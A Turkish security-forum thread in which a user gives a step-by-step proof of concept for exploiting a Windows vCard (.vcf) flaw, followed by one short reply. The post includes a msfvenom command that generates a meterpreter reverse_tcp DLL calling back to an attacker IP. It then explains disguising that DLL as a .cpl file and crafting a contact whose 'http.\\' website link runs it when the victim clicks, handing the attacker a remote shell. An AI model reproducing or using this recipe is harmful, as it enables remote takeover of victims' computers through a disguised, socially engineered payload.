İPUCU

Bilgisayar Güvenliği Bilgisayar Güvenlik Sistemleri makaleleri, virüs korumasından, güvenlik duvarlarına kadar her şeyin nasıl çalıştığı hakkında bilgilere buradan ulaşabilirsiniz.

Seçenekler

Kötücül vCard (.vcf) Dosyası Kullanarak Windows Exploitleme / R4V3N

10-03-2019 05:28
#1
R4V3N - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2016
Nereden:
Antalya
Yaş:
21
Mesajlar:
5.809
Teşekkür (Etti):
681
Teşekkür (Aldı):
1992
Konular:
318
Ticaret:
(0) %
15 Ocak 2019'da bizlere bu zafiyeti getirdiği için siber güvenlik araştırmacısı John Page'e selamlar olsun. Bu bir 0day exploitidir ve tabii ki de güncel Windows 10 ile de çalışır. "Insufficient UI warning remote code execution" denir adına.

John'un bulduğu şey basitçe şudur, bir VCF dosyasına CPL dosyasının yerel yolu ile birlikte websiteye yerleştirirsek tarayıcıda onu açmak yerine direkt indirme eğiliminde olur. Bu da "http://" kısmını "http.<2 tane ters slash>" ile değiştirerek olur ki işin can alıcı kısmı kullanıcının bu tür kasti bir yerel yol yanlışını fark etmesi imkansıza yakındır. Bu yüzden tek yapmamız gereken, VCF dosyasının CPL dosyamızla birlikte (yalnızca yerel yolun dahil edilmesi için HTTP olması gerektiğinden) “HTTP” adındaki bir klasörde kurbana göndermek ve böylelikle bir shell elde edeceğiz.

Ufak Not: "http.<2 tane ters slash>" =

Adımlar:

  • Dll uzantılı bir msfvenom windows payloadı oluşturmak.
  • Dll dosyasını "HTTP" isimli bir klasörde göndermek.
  • "HTTP" klasörünün üst klasöründe bir kişi oluşturmak.
  • Kişiye bir website eklemek.
  • Websitenin önündeki eki "http://" yerine "http.<2 tane ters slash>" olarak değiştirmek.
  • Dll dosyasını <websitenin adı>.cpl olarak yeniden adlandırmak.
  • Multi/handler'ı çalıştırmak
  • Kişiden website yolunu açmak
  • Shell'i spawnlamak.


Kavram Kanıtı:

İlk adım, dll uzantılı bir payload oluşturmaktır. Bunun için msfvenom'un windows payload'ını kullanıyoruz lakin diğer payload'lar da iyicene çalışırlar, bir sıkıntı olmaz.

Bu konu için yerel IP adresimiz 192.168.1.109.

Kod:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f dll > shell.dll




Sonrasında, bu payload'ı kurbana "HTTP" isimli bir klasörde göndereceğiz. Website linkine daha sonra bir yol ekleyeceğimizden ve URL'de HTTP olduğundan klasör adı sadece "HTTP" olmalı, başka bir şey olmamalı. Eğer FTP gibi farklı bir protokol kullandığınızdan URL'nizin önündeki ek farklıysa dizinizin ismini de ftp yapın. Ayrıca geçerli dizinde de olması şart ki bu shell.dll dosyasını kurbanın bilgisayarına kopyalayabilelim.



Sıradaki ve en önemli adım ise bir kişi VCF dosyası oluşturmak. Örnek bir VCF de indirip bir website de ekleyebilirsiniz lakin biz yeni bir tane oluşturacağız.



Herhangi bir isim ekleyin, konu kaynağımın yazarı kendi ismini "Raj Chandel" yazmış.



Home (Ev) sekmesine geçin ve websitesi girmelik bir yer göreceksiniz. Burada yazarın sitesi "hackingarticles.in" eklenmiş lakin asıl önemli olan şey şu:

Genelde websitenin linki https://www.hackingarticles.in lakin bunun başında ufak bir değişikliğe ihtiyacımız var ve "http://" olan kısmını silip "http.<2 tane ters slash>" yazmamız gerekmekte.

Bunun nedeni ise aslında bir website eklemek istemiyoruz, DLL dosyamıza bir yol eklemek istiyoruz ki kurban websiteye tıkladığında DLL'miz çalışabilsin.

Ve website linkinin sonuna ".cpl" eklentisini getiriyoruz. CPL dosyası, Windows işletim sistemi tarafından kullanılan fare, ses veya ağ kontrolleri içeren bir Denetim Masası öğe dosyadır.



Kişiyi kaydedin, ve payload'ımızı ismini düzenleyip shell.dll yerine "www.hackingarticles.in.cpl" olarak değiştirin.



Tamtakırız ve terminalden multi/handler'ı kurmak için DLL dosyasını çalıştırmaya hazırız ve kurbanın bilgisayarında kişiyi açtık.



Linke tıkladığımızda da Kali terminalinde bir oturumun geldiğini göreceğiz.

Konu R4V3N tarafından (10-03-2019 07:30 Saat 07:30 ) değiştirilmiştir.

11-03-2019 16:03
#2
Betrahal - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Mesajlar:
15
Teşekkür (Etti):
17
Teşekkür (Aldı):
1
Konular:
1
Ticaret:
(0) %
gercekten ilginc bir vulnerability, Kali Linuxte test edicem
Konu THE HACKER 21 tarafından (11-03-2019 16:14 Saat 16:14 ) değiştirilmiştir.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı